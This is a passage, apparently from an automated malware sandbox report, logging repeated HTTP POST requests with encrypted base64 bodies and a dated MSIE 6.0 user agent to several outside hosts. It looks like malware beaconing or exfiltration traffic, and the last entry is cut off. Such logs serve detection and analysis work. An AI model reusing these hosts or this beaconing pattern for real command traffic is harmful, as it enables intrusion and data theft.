71 2b 5a 44 64 43 43 32 6c 65 69 69 61 55 44 75 45 44 5a 62 37 67 7a 4d 33 39 6d 71 79 6a 74 49 54 68 49 73 68 38 2f 46 53 50 77 6d 43 57 59 77 4b 77 45 51 66 4c 46 36 48 79 77 62 78 38 76 7a 74 34 32 74 78 2f 77 47 50 51 32 69 4a 39 49 35 70 50 72 37 56 56 68 43 4c 44 4c 61 50 57 47 71 56 54 6b 72 70 6a 4d 56 4b 63 6c 71 51 78 6a 51 6d 59 41 4d 54 6d 77 2f 37 52 6b 59 78 42 79 52 4f 6c 48 6c 71 77 41 33 50 31 75 69 6b 46 62 6b 75 4c 62 55 37 6d 44 6b 6b 39 4e 32 39 61 6c 56 42 61 45 74 5a 67 4b 72 36 6a 7a 55 34 2f 51 4f 31 45 48 44 45 58 33 75 57 41 38 50 6e 30 55 42 55 37 7a 67 2b 65 53 78 64 48 76 70 47 6d 58 66 32 56 55 38 63 30 42 70 49 55 4d 32 54 57 34 50 44 48 53 6d 52 47 57 61 36 6c 45 54 67 64 54 77 48 63 47 39 43 61 38 75 35 30 71 68 52 43 68 30 73 46 6f 75 67 74 4f 76 38 36 4d 6c 59 4c 45 76 6f 42 39 6a 6a 37 73 31 69 71 37 70 51 49 33 2b 4c 54 61 4d 76 70 6f 56 47 6c 71 6f 30 48 39 70 45 44 75 6c 44 49 52 4b 30 78 46 56 4d 30 62 42 6c 63 73 61 4f 68 50 42 72 66 44 4d 47 37 79 32 72 44 49 6b 2f 62 55 64 52 32 7a 6f 75 38 73 4f 4b 59 4b 75 45 7a 36 42 52 6b 51 36 55 6a 30 48 2f 44 61 61 71 79 79 6e 37 50 69 51 6e 53 52 6c 7a 59 43 68 6c 32 43 6f 76 46 6e 39 66 4e 41 72 2b 32 71 6e 53 58 69 31 6e 6d 78 33 68 59 78 38 66 47 49 6b 39 6b 78 38 68 37 49 2b 6d 2f 30 43 6a 77 3d 3d Data Ascii: P3ghWe5sZWUfFxEO+U86b1GYeuBuwfSNAmw0eUpqF6Pw5NvKt4aG8+KSR2ZonZK+w9ZY/IBjs/LcF7VMv0igHV/WwStG0E2+l/vVSWB6z5lhDUyqA+/n4iP1tIA1p8hFDLURr4MAJyVGeenvq+ZDdCC2leiiaUDuEDZb7gzM39mqyjtIThIsh8/FSPwmCWYwKwEQfLF6Hywbx8vzt42tx/wGPQ2iJ9I5pPr7VVhCLDLaPWGqVTkrpjMVKclqQxjQmYAMTmw/7RkYxByROlHlqwA3P1uikFbkuLbU7mDkk9N29alVBaEtZgKr6jzU4/QO1EHDEX3uWA8Pn0UBU7zg+eSxdHvpGmXf2VU8c0BpIUM2TW4PDHSmRGWa6lETgdTwHcG9Ca8u50qhRCh0sFougtOv86MlYLEvoB9jj7s1iq7pQI3+LTaMvpoVGlqo0H9pEDulDIRK0xFVM0bBlcsaOhPBrfDMG7y2rDIk/bUdR2zou8sOKYKuEz6BRkQ6Uj0H/Daaqyyn7PiQnSRlzYChl2CovFn9fNAr+2qnSXi1nmx3hYx8fGIk9kx8h7I+m/0Cjw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 52 2b 45 78 6b 56 42 4f 54 6d 56 6d 38 6a 41 69 34 38 31 73 4f 67 4f 65 70 70 31 34 77 7a 2f 63 68 48 72 4e 69 4d 53 73 69 55 32 35 59 41 32 41 55 42 35 72 46 59 35 6b 70 69 78 73 35 59 4f 42 50 79 51 65 2b 6e 47 79 6b 56 73 66 62 71 78 6e 33 57 6b 52 70 61 58 36 52 35 32 73 75 38 55 51 5a 33 49 78 63 70 5a 47 58 65 46 5a 33 50 39 67 35 52 7a 2b 31 6a 39 4e 6e 59 41 39 6d 61 48 2b 51 7a 38 76 38 2f 34 64 65 6c 58 45 73 2b 35 49 32 75 74 51 31 63 48 6c 74 71 41 74 30 72 31 79 44 46 65 6a 59 6d 73 35 74 64 64 5a 59 30 77 68 33 56 72 59 76 49 34 46 65 76 79 6a 61 58 79 44 4f 77 64 72 76 59 62 73 4b 5a 52 37 71 6d 45 4b 77 6d 4f 6b 57 6b 31 4e 4a 4e 4a 4c 6f 4e 6b 7a 73 54 67 4a 62 43 55 69 42 44 66 36 32 65 51 6c 62 69 41 6c 6c 76 65 75 6b 36 67 43 6d 4c 50 71 41 77 55 4c 41 45 47 6a 42 79 71 4b 47 67 52 71 77 73 4c 6b 62 30 41 35 75 4b 6a 67 76 36 6b 63 34 67 65 6c 7a 65 56 2f 56 30 35 57 76 54 46 70 33 64 6a 72 4f 49 42 55 43 6a 63 4d 56 4f 49 55 62 68 4f 2f 67 4c 54 57 63 47 4b 4d 55 63 53 63 6f 53 50 4c 4c 64 47 72 49 4e 33 36 72 38 76 55 62 4f 61 48 4a 50 62 33 43 77 63 36 59 4a 34 59 6a 32 48 45 63 77 37 50 4a 79 47 45 46 6a 69 69 35 62 4e 33 71 72 75 55 31 57 58 46 61 70 43 59 63 73 51 53 58 78 4d 6f 73 52 35 45 54 41 56 78 49 39 36 7a 4e 6e 50 61 76 33 42 78 56 52 2f 51 65 2f 53 48 55 49 2f 2f 36 5a 57 59 64 41 4a 4c 48 5a 32 73 44 32 6e 54 43 38 6f 54 45 41 67 56 59 56 66 69 6a 53 54 45 4c 77 38 51 78 4e 6d 34 59 49 76 6b 68 53 75 33 61 61 43 35 76 71 45 48 4a 32 76 47 6d 44 63 65 30 2b 74 72 53 69 34 32 31 56 4c 75 49 49 38 49 44 42 49 42 4b 6a 67 50 71 38 49 6f 45 52 44 44 70 61 70 31 79 4c 43 44 44 38 33 43 48 5a 4d 57 71 73 77 3d Data Ascii: R+ExkVBOTmVm8jAi481sOgOepp14wz/chHrNiMSsiU25YA2AUB5rFY5kpixs5YOBPyQe+nGykVsfbqxn3WkRpaX6R52su8UQZ3IxcpZGXeFZ3P9g5Rz+1j9NnYA9maH+Qz8v8/4delXEs+5I2utQ1cHltqAt0r1yDFejYms5tddZY0wh3VrYvI4FevyjaXyDOwdrvYbsKZR7qmEKwmOkWk1NJNJLoNkzsTgJbCUiBDf62eQlbiAllveuk6gCmLPqAwULAEGjByqKGgRqwsLkb0A5uKjgv6kc4gelzeV/V05WvTFp3djrOIBUCjcMVOIUbhO/gLTWcGKMUcScoSPLLdGrIN36r8vUbOaHJPb3Cwc6YJ4Yj2HEcw7PJyGEFjii5bN3qruU1WXFapCYcsQSXxMosR5ETAVxI96zNnPav3BxVR/Qe/SHUI//6ZWYdAJLHZ2sD2nTC8oTEAgVYVfijSTELw8QxNm4YIvkhSu3aaC5vqEHJ2vGmDce0+trSi421VLuII8IDBIBKjgPq8IoERDDpap1yLCDD83CHZMWqsw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 44 4b 6b 41 36 4d 48 50 53 47 56 6f 38 77 6d 68 6f 47 62 42 72 5a 71 70 51 68 67 2f 42 46 54 4b 68 59 4c 6e 74 33 44 76 48 30 4f 49 4b 6b 2b 65 56 72 59 2f 65 50 55 6b 73 51 46 72 43 66 52 6a 6b 67 36 50 59 2b 45 30 6a 77 59 63 56 4e 63 78 4d 4d 48 75 31 54 43 55 47 68 56 30 33 67 79 58 70 4b 76 74 78 35 77 4d 6b 66 51 57 72 6f 6e 63 51 33 35 59 33 4a 2f 56 65 74 51 33 69 49 34 48 78 4b 51 71 2b 62 64 43 4d 6f 45 61 55 56 52 53 73 68 4a 55 4f 70 51 47 34 6f 57 48 64 53 6f 36 6f 2f 6d 50 76 58 73 4e 4a 33 55 33 36 6d 38 33 59 36 30 77 4f 73 73 4f 45 36 51 4f 73 6e 47 54 4a 73 56 76 4b 6b 4f 44 61 73 42 74 50 75 6b 35 52 6b 51 43 4d 2f 49 68 6c 62 68 65 67 75 50 32 57 39 56 63 50 67 6f 6c 51 52 78 6f 49 2b 72 59 70 4d 31 39 78 62 4b 69 5a 47 49 71 6b 2b 46 78 42 75 55 77 63 54 5a 62 4c 38 62 43 43 67 38 58 71 30 70 34 65 78 79 32 47 62 45 4b 38 61 73 50 39 61 6a 58 6d 47 34 4c 59 62 49 45 56 61 6e 4f 58 73 78 5a 44 79 58 6d 50 6b 75 43 6e 65 45 69 70 78 70 47 47 54 38 49 4b 43 5a 42 7a 65 4b 6b 50 6a 4e 2b 4c 57 47 52 46 77 7a 48 4c 61 34 76 79 76 6a 6d 67 43 39 54 35 4b 6b 55 51 46 6e 51 61 45 6a 42 37 46 51 49 36 6d 51 69 45 55 35 32 53 37 42 33 72 78 36 37 39 77 32 5a 79 47 78 68 59 6f 4e 2b 30 55 62 41 4b 43 4a 7a 4f 7a 47 71 55 6c 7a 78 68 5a 78 75 63 74 4c 6f 55 64 45 4c 6e 55 56 58 7a 34 70 33 75 33 45 6b 52 4c 4e 44 4b 48 4b 70 46 6e 6f 6c 2b 4d 6f 32 36 76 63 78 57 35 70 7a 47 72 6a 52 5a 54 6d 78 70 71 6a 4a 79 45 33 44 73 35 54 50 36 43 72 49 79 38 44 6b 6a 4a 66 4a 4d 42 79 63 63 43 76 71 65 70 77 2b 4a 6f 69 4a 61 39 69 76 55 54 4a 30 41 78 56 34 78 79 71 2f 43 35 39 57 52 6a 70 6d 76 32 63 75 67 41 6a 43 72 4d 64 44 35 4d 6e 49 62 54 73 2b 52 50 31 39 74 56 58 51 2f 4c 43 77 34 47 35 74 44 41 3d 3d Data Ascii: DKkA6MHPSGVo8wmhoGbBrZqpQhg/BFTKhYLnt3DvH0OIKk+eVrY/ePUksQFrCfRjkg6PY+E0jwYcVNcxMMHu1TCUGhV03gyXpKvtx5wMkfQWroncQ35Y3J/VetQ3iI4HxKQq+bdCMoEaUVRSshJUOpQG4oWHdSo6o/mPvXsNJ3U36m83Y60wOssOE6QOsnGTJsVvKkODasBtPuk5RkQCM/IhlbheguP2W9VcPgolQRxoI+rYpM19xbKiZGIqk+FxBuUwcTZbL8bCCg8Xq0p4exy2GbEK8asP9ajXmG4LYbIEVanOXsxZDyXmPkuCneEipxpGGT8IKCZBzeKkPjN+LWGRFwzHLa4vyvjmgC9T5KkUQFnQaEjB7FQI6mQiEU52S7B3rx679w2ZyGxhYoN+0UbAKCJzOzGqUlzxhZxuctLoUdELnUVXz4p3u3EkRLNDKHKpFnol+Mo26vcxW5pzGrjRZTmxpqjJyE3Ds5TP6CrIy8DkjJfJMByccCvqepw+JoiJa9ivUTJ0AxV4xyq/C59WRjpmv2cugAjCrMdD5MnIbTs+RP19tVXQ/LCw4G5tDA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 50 33 67 68 57 65 35 73 5a 57 55 66 46 78 45 4f 2b 55 38 36 62 31 47 59 65 75 42 75 77 66 53 4e 41 6d 77 30 65 55 70 71 46 36 50 77 35 4e 76 4b 74 34 61 47 38 2b 4b 53 52 32 5a 6f 6e 5a 4b 2b 77 39 5a 59 2f 49 42 6a 73 2f 4c 63 46 37 56 4d 76 30 69 67 48 56 2f 57 77 53 74 47 30 45 32 2b 6c 2f 76 56 53 57 42 36 7a 35 6c 68 44 55 79 71 41 2b 2f 6e 34 69 50 31 74 49 41 31 70 38 68 46 44 4c 55 52 72 34 4d 41 4a 79 56 47 65 65 6e 76 71 2b 5a 44 64 43 43 32 6c 65 69 69 61 55 44 75 45 44 5a 62 37 67 7a 4d 33 39 6d 71 79 6a 74 49 54 68 49 73 68 38 2f 46 53 50 77 6d 43 57 59 77 4b 77 45 51 66 4c 46 36 48 79 77 62 78 38 76 7a 74 34 32 74 78 2f 77 47 50 51 32 69 4a 39 49 35 70 50 72 37 56 56 68 43 4c 44 4c 61 50 57 47 71 56 54 6b 72 70 6a 4d 56 4b 63 6c 71 51 78 6a 51 6d 59 41 4d 54 6d 77 2f 37 52 6b 59 78 42 79 52 4f 6c 48 6c 71 77 41 33 50 31 75 69 6b 46 62 6b 75 4c 62 55 37 6d 44 6b 6b 39 4e 32 39 61 6c 56 42 61 45 74 5a 67 4b 72 36 6a 7a 55 34 2f 51 4f 31 45 48 44 45 58 33 75 57 41 38 50 6e 30 55 42 55 37 7a 67 2b 65 53 78 64 48 76 70 47 6d 58 66 32 56 55 38 63 30 42 70 49 55 4d 32 54 57 34 50 44 48 53 6d 52 47 57 61 36 6c 45 54 67 64 54 77 48 63 47 39 43 61 38 75 35 30 71 68 52 43 68 30 73 46 6f 75 67 74 4f 76 38 36 4d 6c 59 4c 45 76 6f 42 39 6a 6a 37 73 31 69 71 37 70 51 49 33 2b 4c 54 61 4d 76 70 6f 56 47 6c 71 6f 30 48 39 70 45 44 75 6c 44 49 52 4b 30 78 46 56 4d 30 62 42 6c 63 73 61 4f 68 50 42 72 66 44 4d 47 37 79 32 72 44 49 6b 2f 62 55 64 52 32 7a 6f 75 38 73 4f 4b 59 4b 75 45 7a 36 42 52 6b 51 36 55 6a 30 48 2f 44 61 61 71 79 79 6e 37 50 69 51 6e 53 52 6c 7a 59 43 68 6c 32 43 6f 76 46 6e 39 66 4e 41 72 2b 32 71 6e 53 58 69 31 6e 6d 78 33 68 59 78 38 66 47 49 6b 39 6b 78 38 68 37 49 2b 6d 2f 30 43 6a 77 3d 3d Data Ascii: P3ghWe5sZWUfFxEO+U86b1GYeuBuwfSNAmw0eUpqF6Pw5NvKt4aG8+KSR2ZonZK+w9ZY/IBjs/LcF7VMv0igHV/WwStG0E2+l/vVSWB6z5lhDUyqA+/n4iP1tIA1p8hFDLURr4MAJyVGeenvq+ZDdCC2leiiaUDuEDZb7gzM39mqyjtIThIsh8/FSPwmCWYwKwEQfLF6Hywbx8vzt42tx/wGPQ2iJ9I5pPr7VVhCLDLaPWGqVTkrpjMVKclqQxjQmYAMTmw/7RkYxByROlHlqwA3P1uikFbkuLbU7mDkk9N29alVBaEtZgKr6jzU4/QO1EHDEX3uWA8Pn0UBU7zg+eSxdHvpGmXf2VU8c0BpIUM2TW4PDHSmRGWa6lETgdTwHcG9Ca8u50qhRCh0sFougtOv86MlYLEvoB9jj7s1iq7pQI3+LTaMvpoVGlqo0H9pEDulDIRK0xFVM0bBlcsaOhPBrfDMG7y2rDIk/bUdR2zou8sOKYKuEz6BRkQ6Uj0H/Daaqyyn7PiQnSRlzYChl2CovFn9fNAr+2qnSXi1nmx3hYx8fGIk9kx8h7I+m/0Cjw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 78 55 2f 31 58 48 6c 39 66 6d 55 34 68 74 52 6a 43 49 69 71 43 68 4a 34 59 41 35 58 30 4e 4e 54 76 54 63 48 32 67 41 46 46 70 49 63 45 61 76 46 59 45 78 6c 41 79 79 48 31 45 2f 34 77 41 31 67 42 34 58 2f 4e 48 42 72 31 48 4a 48 4f 36 78 76 4f 62 74 4d 6e 5a 32 70 4d 30 79 2b 6b 6b 4a 64 62 4d 31 67 64 75 35 77 58 2b 32 38 31 75 76 71 51 56 44 7a 4c 53 79 72 62 35 30 74 6f 4d 45 44 73 31 78 65 5a 34 6e 75 78 36 44 38 31 71 66 59 43 61 75 45 69 5a 35 6e 36 7a 6d 75 39 46 38 68 6e 59 6e 69 6d 6e 51 62 53 53 73 48 46 74 44 64 61 64 7a 72 6c 62 4a 63 43 64 66 38 34 32 6d 48 79 30 42 77 71 70 43 47 7a 46 7a 34 2b 6a 39 38 2f 52 41 61 42 54 49 64 43 6d 55 42 6f 6b 32 79 53 68 2f 32 64 49 4c 72 42 46 44 35 4b 71 59 4a 4c 36 4f 49 59 30 32 56 33 4c 32 64 48 30 4c 6a 2b 43 31 57 49 67 4c 46 46 30 53 36 57 43 30 47 54 77 65 57 43 31 57 6b 47 54 6e 2b 2b 2f 45 35 51 70 58 79 77 2f 76 67 50 77 73 50 76 37 30 71 67 2b 31 59 34 62 45 64 4e 32 37 53 37 49 38 34 48 44 68 5a 77 64 70 44 32 31 46 64 33 68 4d 6a 67 49 54 6f 48 34 52 75 55 71 77 73 35 71 2b 53 67 71 4a 47 78 6a 53 33 41 67 53 62 68 57 67 70 31 39 52 36 32 4d 4e 4e 31 4a 52 6c 4b 75 32 69 6d 51 4a 48 63 77 5a 74 58 6a 39 55 79 42 52 75 2b 39 76 6c 59 65 34 35 73 4a 43 53 53 4e 6a 4e 53 43 30 68 2b 39 66 73 58 58 62 62 5a 52 71 5a 79 33 33 78 58 39 65 61 4f 38 72 53 65 6f 56 73 47 65 49 66 58 6b 68 47 58 32 79 6e 52 62 4f 52 54 77 64 47 32 4b 79 63 6a 43 79 31 41 43 4d 48 6c 56 75 34 58 6f 41 6c 6f 6d 42 61 41 36 7a 74 69 5a 68 79 6f 55 50 6d 77 4c 32 51 4e 69 41 38 52 6c 68 75 5a 58 42 30 38 76 4b 46 4f 2f 4d 4e 67 4f 77 78 42 6c 72 53 71 32 66 59 7a 32 7a 42 73 45 66 5a 71 6e 78 51 51 64 4f 39 31 67 3d 3d Data Ascii: xU/1XHl9fmU4htRjCIiqChJ4YA5X0NNTvTcH2gAFFpIcEavFYExlAyyH1E/4wA1gB4X/NHBr1HJHO6xvObtMnZ2pM0y+kkJdbM1gdu5wX+281uvqQVDzLSyrb50toMEDs1xeZ4nux6D81qfYCauEiZ5n6zmu9F8hnYnimnQbSSsHFtDdadzrlbJcCdf842mHy0BwqpCGzFz4+j98/RAaBTIdCmUBok2ySh/2dILrBFD5KqYJL6OIY02V3L2dH0Lj+C1WIgLFF0S6WC0GTweWC1WkGTn++/E5QpXyw/vgPwsPv70qg+1Y4bEdN27S7I84HDhZwdpD21Fd3hMjgIToH4RuUqws5q+SgqJGxjS3AgSbhWgp19R62MNN1JRlKu2imQJHcwZtXj9UyBRu+9vlYe45sJCSSNjNSC0h+9fsXXbbZRqZy33xX9eaO8rSeoVsGeIfXkhGX2ynRbORTwdG2KycjCy1ACMHlVu4XoAlomBaA6ztiZhyoUPmwL2QNiA8RlhuZXB08vKFO/MNgOwxBlrSq2fYz2zBsEfZqnxQQdO91g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 70 4f 62 77 59 72 30 4f 62 6d 58 78 77 53 51 68 64 41 42 61 72 66 62 4e 6d 2f 37 72 68 46 4f 4f 51 5a 50 78 43 57 6c 66 6d 46 39 70 56 2b 45 5a 44 44 59 4e 6e 46 31 4d 7a 6c 67 78 59 39 2b 75 4b 6b 39 57 50 75 69 43 41 71 2f 44 41 6f 48 41 32 43 54 49 50 64 4c 32 30 4f 70 5a 44 59 55 39 68 4a 6a 46 71 79 31 41 67 45 57 47 54 6a 44 6e 52 55 37 59 51 66 43 45 4a 56 66 63 4a 31 51 6c 32 72 63 33 39 65 53 6c 55 42 31 6a 38 6d 35 2f 53 2f 45 47 6d 31 34 41 7a 2b 77 35 6f 71 56 62 50 70 50 75 4f 31 74 54 5a 66 6e 42 66 54 43 34 33 74 63 69 43 2b 4e 4b 37 34 2b 4c 77 61 54 62 46 56 6a 2b 44 46 70 48 76 61 39 71 71 58 69 58 4e 44 42 4b 2b 75 72 59 76 30 38 6a 2f 66 4d 6d 4f 42 70 75 76 57 4e 49 52 47 78 38 71 45 34 39 41 38 69 4e 58 48 74 73 5a 4f 74 55 5a 65 55 76 69 72 62 31 38 75 5a 65 32 39 50 63 55 51 45 2b 32 64 58 67 47 6a 69 36 34 76 2f 47 31 37 45 44 4f 6e 4f 6a 39 77 57 65 2f 44 77 72 79 6f 4c 34 41 72 73 34 34 55 68 61 6d 6b 78 45 77 4f 4f 47 75 7a 50 6f 79 75 69 71 50 6a 49 58 4f 59 2f 4b 4e 46 65 77 4a 36 5a 36 6a 4e 68 65 57 37 34 67 34 63 6d 79 63 78 4b 6f 4d 33 4c 30 46 6f 54 46 35 35 2f 70 42 2f 65 34 4d 33 74 70 30 36 67 48 53 2b 64 30 4e 5a 61 4f 47 6a 34 72 4f 59 58 50 79 59 59 46 31 51 58 47 42 63 38 36 31 4e 66 65 62 7a 57 56 2f 49 4b 50 64 49 75 6b 6d 64 6b 44 58 6f 31 31 35 67 32 38 6e 2b 47 37 48 56 55 63 76 53 72 52 39 44 45 6c 4b 74 77 51 41 64 70 7a 56 64 4b 45 6f 6e 65 6d 7a 49 59 4a 30 62 56 4c 35 52 76 32 48 47 53 70 2f 54 73 72 6b 43 49 36 71 30 43 4d 54 49 6e 48 37 37 67 77 65 68 57 51 42 59 4e 6d 65 38 79 69 50 52 67 48 30 55 77 59 38 69 72 66 79 4c 34 33 45 7a 6a 70 34 59 62 4a 56 79 63 38 42 46 59 70 74 57 58 57 32 41 39 4a 54 30 61 32 6c 41 30 38 33 43 44 7a 72 56 34 74 77 61 4c 6f 66 77 3d 3d Data Ascii: pObwYr0ObmXxwSQhdABarfbNm/7rhFOOQZPxCWlfmF9pV+EZDDYNnF1MzlgxY9+uKk9WPuiCAq/DAoHA2CTIPdL20OpZDYU9hJjFqy1AgEWGTjDnRU7YQfCEJVfcJ1Ql2rc39eSlUB1j8m5/S/EGm14Az+w5oqVbPpPuO1tTZfnBfTC43tciC+NK74+LwaTbFVj+DFpHva9qqXiXNDBK+urYv08j/fMmOBpuvWNIRGx8qE49A8iNXHtsZOtUZeUvirb18uZe29PcUQE+2dXgGji64v/G17EDOnOj9wWe/DwryoL4Ars44UhamkxEwOOGuzPoyuiqPjIXOY/KNFewJ6Z6jNheW74g4cmycxKoM3L0FoTF55/pB/e4M3tp06gHS+d0NZaOGj4rOYXPyYYF1QXGBc861NfebzWV/IKPdIukmdkDXo115g28n+G7HVUcvSrR9DElKtwQAdpzVdKEonemzIYJ0bVL5Rv2HGSp/TsrkCI6q0CMTInH77gwehWQBYNme8yiPRgH0UwY8irfyL43Ezjp4YbJVyc8BFYptWXW2A9JT0a2lA083CDzrV4twaLofw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 78 55 2f 31 58 48 6c 39 66 6d 55 34 68 74 52 6a 43 49 69 71 43 68 4a 34 59 41 35 58 30 4e 4e 54 76 54 63 48 32 67 41 46 46 70 49 63 45 61 76 46 59 45 78 6c 41 79 79 48 31 45 2f 34 77 41 31 67 42 34 58 2f 4e 48 42 72 31 48 4a 48 4f 36 78 76 4f 62 74 4d 6e 5a 32 70 4d 30 79 2b 6b 6b 4a 64 62 4d 31 67 64 75 35 77 58 2b 32 38 31 75 76 71 51 56 44 7a 4c 53 79 72 62 35 30 74 6f 4d 45 44 73 31 78 65 5a 34 6e 75 78 36 44 38 31 71 66 59 43 61 75 45 69 5a 35 6e 36 7a 6d 75 39 46 38 68 6e 59 6e 69 6d 6e 51 62 53 53 73 48 46 74 44 64 61 64 7a 72 6c 62 4a 63 43 64 66 38 34 32 6d 48 79 30 42 77 71 70 43 47 7a 46 7a 34 2b 6a 39 38 2f 52 41 61 42 54 49 64 43 6d 55 42 6f 6b 32 79 53 68 2f 32 64 49 4c 72 42 46 44 35 4b 71 59 4a 4c 36 4f 49 59 30 32 56 33 4c 32 64 48 30 4c 6a 2b 43 31 57 49 67 4c 46 46 30 53 36 57 43 30 47 54 77 65 57 43 31 57 6b 47 54 6e 2b 2b 2f 45 35 51 70 58 79 77 2f 76 67 50 77 73 50 76 37 30 71 67 2b 31 59 34 62 45 64 4e 32 37 53 37 49 38 34 48 44 68 5a 77 64 70 44 32 31 46 64 33 68 4d 6a 67 49 54 6f 48 34 52 75 55 71 77 73 35 71 2b 53 67 71 4a 47 78 6a 53 33 41 67 53 62 68 57 67 70 31 39 52 36 32 4d 4e 4e 31 4a 52 6c 4b 75 32 69 6d 51 4a 48 63 77 5a 74 58 6a 39 55 79 42 52 75 2b 39 76 6c 59 65 34 35 73 4a 43 53 53 4e 6a 4e 53 43 30 68 2b 39 66 73 58 58 62 62 5a 52 71 5a 79 33 33 78 58 39 65 61 4f 38 72 53 65 6f 56 73 47 65 49 66 58 6b 68 47 58 32 79 6e 52 62 4f 52 54 77 64 47 32 4b 79 63 6a 43 79 31 41 43 4d 48 6c 56 75 34 58 6f 41 6c 6f 6d 42 61 41 36 7a 74 69 5a 68 79 6f 55 50 6d 77 4c 32 51 4e 69 41 38 52 6c 68 75 5a 58 42 30 38 76 4b 46 4f 2f 4d 4e 67 4f 77 78 42 6c 72 53 71 32 66 59 7a 32 7a 42 73 45 66 5a 71 6e 78 51 51 64 4f 39 31 67 3d 3d Data Ascii: xU/1XHl9fmU4htRjCIiqChJ4YA5X0NNTvTcH2gAFFpIcEavFYExlAyyH1E/4wA1gB4X/NHBr1HJHO6xvObtMnZ2pM0y+kkJdbM1gdu5wX+281uvqQVDzLSyrb50toMEDs1xeZ4nux6D81qfYCauEiZ5n6zmu9F8hnYnimnQbSSsHFtDdadzrlbJcCdf842mHy0BwqpCGzFz4+j98/RAaBTIdCmUBok2ySh/2dILrBFD5KqYJL6OIY02V3L2dH0Lj+C1WIgLFF0S6WC0GTweWC1WkGTn++/E5QpXyw/vgPwsPv70qg+1Y4bEdN27S7I84HDhZwdpD21Fd3hMjgIToH4RuUqws5q+SgqJGxjS3AgSbhWgp19R62MNN1JRlKu2imQJHcwZtXj9UyBRu+9vlYe45sJCSSNjNSC0h+9fsXXbbZRqZy33xX9eaO8rSeoVsGeIfXkhGX2ynRbORTwdG2KycjCy1ACMHlVu4XoAlomBaA6ztiZhyoUPmwL2QNiA8RlhuZXB08vKFO/MNgOwxBlrSq2fYz2zBsEfZqnxQQdO91g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 53 33 68 66 57 30 6c 77 66 6d 56 58 73 72 46 58 6d 4c 32 34 75 32 4b 48 47 74 64 6e 51 35 6a 41 6a 57 39 70 34 71 35 4b 66 4a 59 49 44 70 41 36 62 55 35 41 5a 33 36 30 42 37 51 53 62 66 52 33 69 74 34 77 7a 4d 75 4b 74 49 35 4e 49 66 35 43 5a 56 65 31 36 6c 70 69 70 6e 4b 71 46 56 4e 34 33 76 56 4a 6b 71 35 44 2f 41 4c 31 41 45 65 61 39 52 6d 64 2b 46 43 5a 51 53 6e 62 32 35 56 76 4a 52 45 55 45 36 73 45 34 67 76 61 55 39 70 69 4a 36 53 2f 47 4b 37 52 67 44 44 4c 52 6a 76 39 38 52 75 78 4c 33 2f 5a 4f 70 54 2b 6b 59 2b 36 54 72 77 52 6a 73 70 4e 31 72 56 49 51 79 58 6e 71 46 43 61 55 4a 68 39 54 44 51 34 35 33 73 56 72 78 38 6c 33 76 4b 34 33 5a 2b 46 5a 71 31 63 37 6c 50 4a 63 77 59 68 69 35 41 63 70 2f 6a 49 63 6e 62 53 68 77 4e 47 49 58 57 66 41 67 49 41 56 74 6d 58 32 66 53 4b 37 38 30 69 43 54 2f 31 70 4e 70 30 54 7a 56 2b 54 4a 6c 6d 56 78 33 70 71 44 72 51 6e 61 46 48 31 38 48 65 48 6a 43 31 4b 31 41 38 35 38 2b 75 42 63 36 6c 47 36 4f 6e 36 32 62 53 59 69 4e 69 35 4e 4c 31 2b 72 58 2f 2b 4b 64 67 31 4f 6a 2b 44 31 42 47 4d 2f 6d 31 31 46 47 36 6a 62 57 47 2f 2f 70 2b 73 31 67 69 50 78 4c 47 32 50 4d 37 6d 6b 76 34 33 79 33 48 41 30 4f 35 38 72 64 4f 32 2f 62 51 35 73 2b 67 49 34 6f 61 72 48 38 30 4b 5a 77 54 6d 52 54 50 34 59 68 78 42 5a 6d 4c 64 47 43 31 76 74 62 6d 59 59 6d 34 47 45 67 67 45 4d 32 4f 59 4e 33 56 43 53 6f 6e 59 4d 68 73 76 53 69 42 51 30 76 4c 2f 35 4e 4d 65 75 50 54 6c 57 32 7a 79 2f 4f 32 58 2f 38 50 78 46 79 4e 75 35 55 31 41 48 61 31 76 55 48 5a 35 39 59 62 53 74 56 6d 67 4d 66 54 75 34 6e 67 56 4d 72 46 67 51 69 77 51 74 37 58 67 5a 45 68 4b 6d 61 46 35 69 78 49 2f 43 57 73 Data Ascii: 